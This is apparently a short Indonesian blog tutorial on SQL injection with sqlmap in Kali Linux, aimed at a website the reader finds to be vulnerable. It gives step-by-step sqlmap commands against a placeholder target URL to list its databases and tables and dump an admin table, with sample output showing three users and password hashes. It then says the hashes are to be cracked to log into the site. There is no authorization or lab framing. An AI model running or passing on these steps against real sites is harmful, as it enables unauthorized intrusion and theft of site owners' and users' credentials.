Tutorial Sql injection dengan sqlmap kali linux

Tutorial Sql injection dengan sqlmap kali linux

Oke pada kali ini saya akan membuat tutorial sql injection dengan sqlmap di kali linu
sebelum memulai sediakan website yang vuln
kalo sudah ada mari kita mulai sql injectionnya


Pertama kita akan lihat dulu isi dari database situs tersebut

sqlmap.py -u www.sitetarget.com/display.php?catId=22 --dbs

Tunggu hingga muncul database target

site tersebut terdapat 2 database

[*] information_schema

[*] wwwenkay_qEnkayDB

sekarang kita akan melihat isi tabel dari database wwwenkay_qEnkayDB

sqlmap.py -u www.sitetarget.com/display.php?catId=22 -D nama_database --tables

Tunggu hingga muncul tabel

Database tersebut terdapat 15 tabel,nah sekarang kita ingin melihat isi dari tabel admin

sqlmap.py -u www.sitetarget.com/display.php?catId=22 -D nama_database -T nama_tabel --dump

Ternyata terdapat 3 user dan passwordnya berupa hash,untuk masuk ke dalam site tersebut kita harus decrypt dulu

untuk decryptnya saya akan update di post selanjutnnya atau agan bisa searching di google 

(^^^)